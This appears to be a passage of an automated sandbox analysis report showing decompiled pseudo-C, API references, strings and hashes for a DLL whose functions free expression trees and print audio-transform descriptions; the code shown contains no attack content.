							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						E100265C0(__eax);
						__eax =  &_a52;
						E100265C0( &_a52);
						__edi = _a48;
					}
					__eax =  *(__edi + 0x1c);
					_a52 = __eax;
					if(__eax == 0) {
						L22:
						__eax =  *(__edi + 0x20);
						_a52 = __eax;
						if(__eax == 0) {
							L30:
							E100265C0(__edi);
							__eax =  &_a48;
							E100265C0( &_a48);
							goto L1;
						}
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						E100265C0(__eax);
						__eax =  &_a52;
						E100265C0( &_a52);
						__edi = _a48;
						goto L30;
					} else {
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						E100265C0(__eax);
						__eax =  &_a52;
						E100265C0( &_a52);
						__edi = _a48;
						goto L22;
					}
				}
				L1:
				 *_t120 = _t116;
				L100265B0();
				return _t118;
			}

0x10017261
0x10017268
0x1001726c
0x10017271
0x10017276
0x1001727a
0x1001727e
0x10017282
0x10017286
0x10017289
0x10017293
0x10017299
0x1001729b
0x1001729e
0x100172a4
0x100172aa
0x100172ad
0x100172b3
0x100172bb
0x100172c4
0x100172ca
0x100172d3
0x100172de
0x100172e2
0x100172e8
0x100172ed
0x100172f4
0x100172f9
0x100172f9
0x100172fd
0x10017300
0x10017306
0x1001730e
0x10017317
0x1001731d
0x10017326
0x10017331
0x10017335
0x1001733b
0x10017340
0x10017347
0x1001734c
0x1001734c
0x10017350
0x10017353
0x10017359
0x10017361
0x1001736a
0x10017370
0x10017379
0x10017384
0x10017388
0x1001738e
0x10017393
0x1001739a
0x1001739f
0x1001739f
0x100173a9
0x100173ae
0x100173b5
0x100173ba
0x100173ba
0x100173be
0x100173c1
0x100173c7
0x100174e1
0x100174e1
0x100174e4
0x100174ea
0x10017604
0x1001760a
0x1001760f
0x10017616
0x00000000
0x10017616
0x100174f0
0x100174f3
0x100174f9
0x10017501
0x1001750a
0x10017510
0x10017519
0x10017524
0x10017528
0x1001752e
0x10017533
0x1001753a
0x1001753f
0x1001753f
0x10017543
0x10017546
0x1001754c
0x10017554
0x1001755d
0x10017563
0x1001756c
0x10017577
0x1001757b
0x10017581
0x10017586
0x1001758d
0x10017592
0x10017592
0x10017596
0x10017599
0x1001759f
0x100175a7
0x100175b0
0x100175b6
0x100175bf
0x100175ca
0x100175ce
0x100175d4
0x100175d9
0x100175e0
0x100175e5
0x100175e5
0x100175ef
0x100175f4
0x100175fb
0x10017600
0x00000000
0x100173cd
0x100173cd
0x100173d0
0x100173d6
0x100173de
0x100173e7
0x100173ed
0x100173f6
0x10017401
0x10017405
0x1001740b
0x10017410
0x10017417
0x1001741c
0x1001741c
0x10017420
0x10017423
0x10017429
0x10017431
0x1001743a
0x10017440
0x10017449
0x10017454
0x10017458
0x1001745e
0x10017463
0x1001746a
0x1001746f
0x1001746f
0x10017473
0x10017476
0x1001747c
0x10017484
0x1001748d
0x10017493
0x1001749c
0x100174a7
0x100174ab
0x100174b1
0x100174b6
0x100174bd
0x100174c2
0x100174c2
0x100174cc
0x100174d1
0x100174d8
0x100174dd
0x00000000
0x100174dd
0x100173c7
0x1001724f
0x1001724f
0x10017252
0x10017260

APIs

mv_log.MAIN ref: 10017289
mv_freep.MAIN ref: 100172E8
mv_freep.MAIN ref: 100172F4
mv_expr_free.MAIN ref: 100172D9

Part of subcall function 10015280: mv_freep.MAIN ref: 10015588
Part of subcall function 10015280: mv_freep.MAIN ref: 10015594
Part of subcall function 10015280: mv_freep.MAIN ref: 100155DB
Part of subcall function 10015280: mv_freep.MAIN ref: 100155E7
Part of subcall function 10015280: mv_freep.MAIN ref: 100155F6
Part of subcall function 10015280: mv_freep.MAIN ref: 10015602
Part of subcall function 10015280: mv_freep.MAIN ref: 10015667
Part of subcall function 10015280: mv_freep.MAIN ref: 10015673
Part of subcall function 10015280: mv_freep.MAIN ref: 100156BA

mv_expr_free.MAIN ref: 100172CA

Part of subcall function 10015280: mv_freep.MAIN ref: 1001542C
Part of subcall function 10015280: mv_freep.MAIN ref: 10015438
Part of subcall function 10015280: mv_freep.MAIN ref: 10015447
Part of subcall function 10015280: mv_freep.MAIN ref: 10015453
Part of subcall function 10015280: mv_freep.MAIN ref: 1001549A
Part of subcall function 10015280: mv_freep.MAIN ref: 100154A6
Part of subcall function 10015280: mv_freep.MAIN ref: 100154B5
Part of subcall function 10015280: mv_freep.MAIN ref: 100154C1
Part of subcall function 10015280: mv_freep.MAIN ref: 10015517
Part of subcall function 10015280: mv_freep.MAIN ref: 10015523

mv_expr_free.MAIN ref: 100172BB

Part of subcall function 10015280: mv_freep.MAIN ref: 100152FA
Part of subcall function 10015280: mv_freep.MAIN ref: 10015306
Part of subcall function 10015280: mv_freep.MAIN ref: 1001534D
Part of subcall function 10015280: mv_freep.MAIN ref: 10015359
Part of subcall function 10015280: mv_freep.MAIN ref: 10015368
Part of subcall function 10015280: mv_freep.MAIN ref: 10015374
Part of subcall function 10015280: mv_freep.MAIN ref: 100153D9
Part of subcall function 10015280: mv_freep.MAIN ref: 100153E5

mv_expr_free.MAIN ref: 1001730E
mv_expr_free.MAIN ref: 1001731D
mv_expr_free.MAIN ref: 1001732C
mv_freep.MAIN ref: 1001733B
mv_freep.MAIN ref: 10017347
mv_expr_free.MAIN ref: 10017361
mv_expr_free.MAIN ref: 10017370
mv_expr_free.MAIN ref: 1001737F
mv_freep.MAIN ref: 1001738E
mv_freep.MAIN ref: 1001739A
mv_freep.MAIN ref: 100173A9
mv_freep.MAIN ref: 100173B5
mv_expr_free.MAIN ref: 100173DE
mv_expr_free.MAIN ref: 100173ED
mv_expr_free.MAIN ref: 100173FC
mv_freep.MAIN ref: 1001740B
mv_freep.MAIN ref: 10017417
mv_expr_free.MAIN ref: 10017431
mv_expr_free.MAIN ref: 10017440
mv_expr_free.MAIN ref: 1001744F
mv_freep.MAIN ref: 1001745E
mv_freep.MAIN ref: 1001746A
mv_expr_free.MAIN ref: 10017484
mv_expr_free.MAIN ref: 10017493
mv_expr_free.MAIN ref: 100174A2
mv_freep.MAIN ref: 100174B1
mv_freep.MAIN ref: 100174BD
mv_freep.MAIN ref: 100174CC
mv_freep.MAIN ref: 100174D8
mv_expr_free.MAIN ref: 10017501
mv_expr_free.MAIN ref: 10017510
mv_expr_free.MAIN ref: 1001751F
mv_freep.MAIN ref: 1001752E
mv_freep.MAIN ref: 1001753A
mv_expr_free.MAIN ref: 10017554
mv_expr_free.MAIN ref: 10017563
mv_expr_free.MAIN ref: 10017572
mv_freep.MAIN ref: 10017581
mv_freep.MAIN ref: 1001758D
mv_expr_free.MAIN ref: 100175A7
mv_expr_free.MAIN ref: 100175B6
mv_expr_free.MAIN ref: 100175C5
mv_freep.MAIN ref: 100175D4
mv_freep.MAIN ref: 100175E0
mv_freep.MAIN ref: 100175EF
mv_freep.MAIN ref: 100175FB
mv_freep.MAIN ref: 1001760A
mv_freep.MAIN ref: 10017616

Strings

Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_expr_free$mv_log
String ID: Invalid chars '%s' at the end of expression '%s'
API String ID: 75827668-1422635149
Opcode ID: 868f8d433a9d4ff7ca381ed327b9c79258ebc14a83ef6ba52564f0dccba394d0
Instruction ID: 47d116fedaedebc931fd27d2d79ea71f155cf045d5fda504e80a0eb2e0d77697
Opcode Fuzzy Hash: 868f8d433a9d4ff7ca381ed327b9c79258ebc14a83ef6ba52564f0dccba394d0
Instruction Fuzzy Hash: 86C146B95097519FC784EFA8D48581EBBE0FF88350F85586DF8C18B316E735E8848B92

Uniqueness

Uniqueness Score: -1.00%

Function 100177F0 Relevance: 75.3, APIs: 50, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mv_expr_parse.MAIN ref: 10017862

Part of subcall function 10017110: strlen.MSVCRT ref: 10017141
Part of subcall function 10017110: mv_malloc.MAIN ref: 1001714A

mv_expr_free.MAIN ref: 100178D7
mv_expr_free.MAIN ref: 100178E6
mv_expr_free.MAIN ref: 100178F5
mv_freep.MAIN ref: 10017904
mv_freep.MAIN ref: 1001790C
mv_expr_free.MAIN ref: 10017926
mv_expr_free.MAIN ref: 10017935
mv_expr_free.MAIN ref: 10017944
mv_freep.MAIN ref: 10017953
mv_freep.MAIN ref: 1001795B
mv_expr_free.MAIN ref: 10017975
mv_expr_free.MAIN ref: 10017984
mv_expr_free.MAIN ref: 10017993
mv_freep.MAIN ref: 100179A2
mv_freep.MAIN ref: 100179AA
mv_freep.MAIN ref: 100179B9
mv_freep.MAIN ref: 100179C5
mv_expr_free.MAIN ref: 100179EE
mv_freep.MAIN ref: 10017A1B
mv_freep.MAIN ref: 10017A23
mv_freep.MAIN ref: 10017A79
mv_freep.MAIN ref: 10017A81
mv_expr_free.MAIN ref: 10017A6A

Part of subcall function 10015280: mv_freep.MAIN ref: 100159C5
Part of subcall function 10015280: mv_freep.MAIN ref: 100159D1
Part of subcall function 10015280: mv_freep.MAIN ref: 100159E0
Part of subcall function 10015280: mv_freep.MAIN ref: 100159EC
Part of subcall function 10015280: mv_freep.MAIN ref: 100159FB
Part of subcall function 10015280: mv_freep.MAIN ref: 10015A07
Part of subcall function 10015280: mv_freep.MAIN ref: 10015A16
Part of subcall function 10015280: mv_freep.MAIN ref: 10015A22

mv_expr_free.MAIN ref: 10017A5B

Part of subcall function 10015280: mv_freep.MAIN ref: 1001584F
Part of subcall function 10015280: mv_freep.MAIN ref: 1001585B
Part of subcall function 10015280: mv_freep.MAIN ref: 100158A2
Part of subcall function 10015280: mv_freep.MAIN ref: 100158AE
Part of subcall function 10015280: mv_freep.MAIN ref: 100158BD
Part of subcall function 10015280: mv_freep.MAIN ref: 100158C9
Part of subcall function 10015280: mv_freep.MAIN ref: 1001591F
Part of subcall function 10015280: mv_freep.MAIN ref: 1001592B
Part of subcall function 10015280: mv_freep.MAIN ref: 10015972
Part of subcall function 10015280: mv_freep.MAIN ref: 1001597E

mv_expr_free.MAIN ref: 10017A4C

Part of subcall function 10015280: mv_freep.MAIN ref: 100156C6
Part of subcall function 10015280: mv_freep.MAIN ref: 100156D5
Part of subcall function 10015280: mv_freep.MAIN ref: 100156E1
Part of subcall function 10015280: mv_freep.MAIN ref: 100156F0
Part of subcall function 10015280: mv_freep.MAIN ref: 100156FC
Part of subcall function 10015280: mv_freep.MAIN ref: 10015770
Part of subcall function 10015280: mv_freep.MAIN ref: 1001577C
Part of subcall function 10015280: mv_freep.MAIN ref: 1001579A
Part of subcall function 10015280: mv_freep.MAIN ref: 100157A6
Part of subcall function 10015280: mv_freep.MAIN ref: 100157FC
Part of subcall function 10015280: mv_freep.MAIN ref: 10015808

mv_freep.MAIN ref: 10017A90
mv_freep.MAIN ref: 10017A9C
mv_expr_free.MAIN ref: 10017AC5
mv_expr_free.MAIN ref: 10017AD4
mv_expr_free.MAIN ref: 10017AE3
mv_freep.MAIN ref: 10017AF2
mv_freep.MAIN ref: 10017AFA
mv_expr_free.MAIN ref: 10017B14
mv_expr_free.MAIN ref: 10017B23
mv_expr_free.MAIN ref: 10017B32
mv_freep.MAIN ref: 10017B41
mv_freep.MAIN ref: 10017B49
mv_expr_free.MAIN ref: 10017A32

Part of subcall function 10015280: mv_freep.MAIN ref: 10015588
Part of subcall function 10015280: mv_freep.MAIN ref: 10015594
Part of subcall function 10015280: mv_freep.MAIN ref: 100155DB
Part of subcall function 10015280: mv_freep.MAIN ref: 100155E7
Part of subcall function 10015280: mv_freep.MAIN ref: 100155F6
Part of subcall function 10015280: mv_freep.MAIN ref: 10015602
Part of subcall function 10015280: mv_freep.MAIN ref: 10015667
Part of subcall function 10015280: mv_freep.MAIN ref: 10015673
Part of subcall function 10015280: mv_freep.MAIN ref: 100156BA

mv_expr_free.MAIN ref: 10017A0C

Part of subcall function 10015280: mv_freep.MAIN ref: 1001542C
Part of subcall function 10015280: mv_freep.MAIN ref: 10015438
Part of subcall function 10015280: mv_freep.MAIN ref: 10015447
Part of subcall function 10015280: mv_freep.MAIN ref: 10015453
Part of subcall function 10015280: mv_freep.MAIN ref: 1001549A
Part of subcall function 10015280: mv_freep.MAIN ref: 100154A6
Part of subcall function 10015280: mv_freep.MAIN ref: 100154B5
Part of subcall function 10015280: mv_freep.MAIN ref: 100154C1
Part of subcall function 10015280: mv_freep.MAIN ref: 10015517
Part of subcall function 10015280: mv_freep.MAIN ref: 10015523

mv_expr_free.MAIN ref: 100179FD

Part of subcall function 10015280: mv_freep.MAIN ref: 100152FA
Part of subcall function 10015280: mv_freep.MAIN ref: 10015306
Part of subcall function 10015280: mv_freep.MAIN ref: 1001534D
Part of subcall function 10015280: mv_freep.MAIN ref: 10015359
Part of subcall function 10015280: mv_freep.MAIN ref: 10015368
Part of subcall function 10015280: mv_freep.MAIN ref: 10015374
Part of subcall function 10015280: mv_freep.MAIN ref: 100153D9
Part of subcall function 10015280: mv_freep.MAIN ref: 100153E5

mv_expr_free.MAIN ref: 10017B63
mv_expr_free.MAIN ref: 10017B72
mv_expr_free.MAIN ref: 10017B81
mv_freep.MAIN ref: 10017B90
mv_freep.MAIN ref: 10017B98
mv_freep.MAIN ref: 10017BA7
mv_freep.MAIN ref: 10017BB3
mv_freep.MAIN ref: 10017BC2
mv_freep.MAIN ref: 10017BCE

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_expr_free$mv_expr_parsemv_mallocstrlen
String ID:
API String ID: 1389959791-0
Opcode ID: 8ed2cf0b96ea738395e10688aaa6a7ba80d46e84586e5b5581eb5791b7552261
Instruction ID: 676c052f7482def6436772c87c2f32b108e761ae451283d38321aee012e0f911
Opcode Fuzzy Hash: 8ed2cf0b96ea738395e10688aaa6a7ba80d46e84586e5b5581eb5791b7552261
Instruction Fuzzy Hash: 1BD173B9A187418FC750EF68D48191ABBF0FF89214F45496DE9D48B315E736E8848F82

Uniqueness

Uniqueness Score: -1.00%

Function 1004E110 Relevance: 57.9, APIs: 15, Strings: 18, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E1004E110(intOrPtr* __eax, void* __ecx, char* __edx) {
				char _v1052;
				char* _v1056;
				intOrPtr _v1072;
				char* _v1076;
				char* _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t52;
				signed int _t57;
				char* _t59;
				char* _t64;
				intOrPtr* _t92;
				char* _t102;
				char* _t104;
				void* _t108;
				signed int _t109;
				void* _t111;
				char* _t112;
				void* _t113;
				intOrPtr* _t114;

				_t111 = __ecx;
				_t92 = __eax;
				_t114 = _t113 - 0x42c;
				_t52 = 0;
				_v1056 = __edx;
				do {
					 *((intOrPtr*)(_t114 + _t52 + 0x20)) = 0;
					 *((intOrPtr*)(_t114 + _t52 + 0x24)) = 0;
					_t52 = _t52 + 8;
				} while (_t52 < 0x400);
				_v1076 = 1;
				_t112 =  &_v1052;
				_v1080 = 0;
				 *_t114 = _t112;
				E10008880(__eax, _t108, __ecx, _t112);
				_v1080 = "%s - type: ";
				 *_t114 = _t112;
				_v1076 =  *_t92;
				L100089C0();
				_t57 =  *(_t92 + 8);
				if(_t57 > 8) {
					_t59 =  !=  ? "unknown" : "any";
				} else {
					switch( *((intOrPtr*)(_t57 * 4 +  &M100BCC2C))) {
						case 0:
							__eax = "fft_float";
							goto L5;
						case 1:
							_t59 = "mdct_float";
							goto L5;
						case 2:
							__eax = "fft_double";
							goto L5;
						case 3:
							__eax = "mdct_double";
							goto L5;
						case 4:
							__eax = "fft_int32";
							goto L5;
						case 5:
							__eax = "mdct_int32";
							goto L5;
						case 6:
							__eax = "rdft_float";
							goto L5;
						case 7:
							__eax = "rdft_double";
							goto L5;
						case 8:
							__eax = "rdft_int32";
							goto L5;
					}
				}
				L5:
				_v1076 = _t59;
				_v1080 = "%s";
				 *_t114 = _t112;
				L100089C0();
				_v1080 = ", len: ";
				 *_t114 = _t112;
				L100089C0();
				_t102 =  *((intOrPtr*)(_t92 + 0x28));
				_t64 =  *((intOrPtr*)(_t92 + 0x2c));
				if(_t102 != _t64) {
					_v1076 = _t102;
					_v1080 = "[%i, ";
					 *_t114 = _t112;
					L100089C0();
					_t64 =  *((intOrPtr*)(_t92 + 0x2c));
				}
				if(_t64 == 0xffffffff) {
					 *_t114 = _t112;
					_v1080 = 0x100bcc00;
					L100089C0();
				} else {
					_v1076 = _t64;
					_v1080 = 0x100bcc04;
					 *_t114 = _t112;
					L100089C0();
				}
				_v1080 = "%s, factors: [";
				 *_t114 = _t112;
				_t69 =  !=  ? 0x100bcb72 : 0x100bcb03;
				_t109 = 0;
				_v1076 =  !=  ? 0x100bcb72 : 0x100bcb03;
				L100089C0();
				_t104 =  *((intOrPtr*)(_t92 + 0x18));
				if(_t104 == 0xffffffff) {
					 *_t114 = _t112;
					_t109 = 1;
					_v1080 = "any";
					L100089C0();
					goto L13;
				} else {
					L10:
					if(_t104 != 0) {
						_v1076 = _t104;
						_v1080 = 0x100bcc04;
						 *_t114 = _t112;
						L100089C0();
						L12:
						_t109 = _t109 + 1;
						if(_t109 != 4) {
							L13:
							if( *((intOrPtr*)(_t92 + 0x18 + _t109 * 4)) != 0) {
								 *_t114 = _t112;
								_v1080 = 0x100bcb00;
								L100089C0();
								_t104 =  *((intOrPtr*)(_t92 + 0x18 + _t109 * 4));
								if(_t104 != 0xffffffff) {
									goto L10;
								} else {
									 *_t114 = _t112;
									_v1080 = "any";
									L100089C0();
									goto L12;
								}
							}
						}
					}
				}
				 *_t114 = _t112;
				_v1080 = "], ";
				L100089C0();
				L1004DA90(_t112,  *((intOrPtr*)(_t92 + 0x14)),  *((intOrPtr*)(_t92 + 0x10)));
				if(_t111 != 0) {
					 *_t114 = _t112;
					_v1080 = ", prio: %i";
					_v1076 = _v1056;
					L100089C0();
				}
				 *_t114 = 0;
				_v1080 = 0x28;
				_v1072 = _v1052;
				_v1076 = "%s\n";
				return L10023A40();
			}

0x1004e113
0x1004e116
0x1004e118
0x1004e11e
0x1004e120
0x1004e126
0x1004e126
0x1004e12a
0x1004e12e
0x1004e131
0x1004e13f
0x1004e143
0x1004e147
0x1004e14b
0x1004e14e
0x1004e15a
0x1004e15e
0x1004e161
0x1004e165
0x1004e16a
0x1004e170
0x1004e373
0x1004e176
0x1004e176
0x00000000
0x1004e320
0x00000000
0x00000000
0x1004e180
0x00000000
0x00000000
0x1004e2f0
0x00000000
0x00000000
0x1004e2e0
0x00000000
0x00000000
0x1004e2d0
0x00000000
0x00000000
0x1004e2c0
0x00000000
0x00000000
0x1004e310
0x00000000
0x00000000
0x1004e300
0x00000000
0x00000000
0x1004e2b0
0x00000000
0x00000000
0x1004e176
0x1004e190
0x1004e190
0x1004e199
0x1004e19d
0x1004e1a0
0x1004e1aa
0x1004e1ae
0x1004e1b1
0x1004e1b6
0x1004e1b9
0x1004e1be
0x1004e1c0
0x1004e1c9
0x1004e1cd
0x1004e1d0
0x1004e1d5
0x1004e1d5
0x1004e1db
0x1004e380
0x1004e388
0x1004e38c
0x1004e1e1
0x1004e1e1
0x1004e1ea
0x1004e1ee
0x1004e1f1
0x1004e1f1
0x1004e20b
0x1004e20f
0x1004e212
0x1004e215
0x1004e217
0x1004e21b
0x1004e220
0x1004e226
0x1004e3c0
0x1004e3c8
0x1004e3cd
0x1004e3d1
0x00000000
0x1004e22c
0x1004e22c
0x1004e22e
0x1004e230
0x1004e239
0x1004e23d
0x1004e240
0x1004e245
0x1004e245
0x1004e249
0x1004e24b
0x1004e251
0x1004e330
0x1004e338
0x1004e33c
0x1004e341
0x1004e348
0x00000000
0x1004e34e
0x1004e34e
0x1004e356
0x1004e35a
0x00000000
0x1004e35a
0x1004e348
0x1004e251
0x1004e249
0x1004e22e
0x1004e257
0x1004e25f
0x1004e263
0x1004e272
0x1004e279
0x1004e3a0
0x1004e3ac
0x1004e3b0
0x1004e3b4
0x1004e3b4
0x1004e27f
0x1004e28f
0x1004e293
0x1004e29c
0x1004e2af

APIs

mv_bprint_init.MAIN ref: 1004E14E
mv_bprintf.MAIN ref: 1004E165

Strings

any, xrefs: 1004E351, 1004E36E, 1004E3C3
fft_float, xrefs: 1004E320
fft_int32, xrefs: 1004E2D0
%s, factors: [, xrefs: 1004E1FE
], , xrefs: 1004E25A
[%i, , xrefs: 1004E1C4
rdft_int32, xrefs: 1004E2B0
mdct_float, xrefs: 1004E180
rdft_float, xrefs: 1004E310
%s, xrefs: 1004E297
fft_double, xrefs: 1004E2F0
mdct_int32, xrefs: 1004E2C0
, len: , xrefs: 1004E1A5
, prio: %i, xrefs: 1004E3A7
unknown, xrefs: 1004E369
rdft_double, xrefs: 1004E300
%s - type: , xrefs: 1004E155
mdct_double, xrefs: 1004E2E0

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_initmv_bprintf
String ID: %s$%s - type: $%s, factors: [$, len: $, prio: %i$[%i, $], $any$fft_double$fft_float$fft_int32$mdct_double$mdct_float$mdct_int32$rdft_double$rdft_float$rdft_int32$unknown
API String ID: 3566169034-155954179
Opcode ID: 88f9e843cdda70b065da0d6e9f33fb5096cf4e39f39d2173ac39fcec4dc56677
Instruction ID: a933a466284158a9cdbf5e2fa88c9023184ecaf356d014cc5bc8696811956cc8
Opcode Fuzzy Hash: 88f9e843cdda70b065da0d6e9f33fb5096cf4e39f39d2173ac39fcec4dc56677
Instruction Fuzzy Hash: 5051F7B8A08784CBD740EF29858191EBBE1FB84350F65892EE8C9CB355DB38DC409B46

Uniqueness

Uniqueness Score: -1.00%

Function 10009730 Relevance: 51.1, APIs: 23, Strings: 6, Instructions: 372
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E10009730(int _a4, int _a8, unsigned int _a12, void** _a16, void* _a20) {
				char _v29;
				signed int _v32;
				int _v36;
				char _v37;
				void** _v40;
				signed int _v44;
				char** _v52;
				int _v56;
				int __ebx;
				int __edi;
				signed int __esi;
				int __ebp;
				signed int _t114;
				void** _t115;
				int _t116;
				int _t117;
				void* _t118;
				void* _t119;
				int _t120;
				void* _t121;
				signed char _t123;
				void* _t124;
				signed char* _t129;
				int _t130;
				void* _t133;
				unsigned int _t135;
				int _t136;
				signed int _t137;
				char _t146;
				void* _t150;
				int _t157;
				signed int _t158;
				void* _t163;
				void* _t164;
				void* _t167;
				void** _t170;
				int _t172;
				int _t173;
				int _t174;
				void* _t175;
				void** _t178;
				void*** _t179;
				void** _t180;

				_t179 =  &_v44;
				_t170 = _a4;
				_t129 = _a8;
				_v44 = _a12;
				_t112 = _a16;
				if(_a16 == 2) {
					L1();
					_t114 =  *_t129 & 0x000000ff;
					__eflags = _t114;
					if(_t114 != 0) {
						while(1) {
							L56:
							__eflags = _t114 - 0x27;
							if(_t114 == 0x27) {
								break;
							}
							_t129 =  &(_t129[1]);
							L1();
							_t114 =  *_t129 & 0x000000ff;
							__eflags = _t114;
							if(_t114 != 0) {
								continue;
							}
							goto L58;
						}
						 *_t179 = _t170;
						_t129 =  &(_t129[1]);
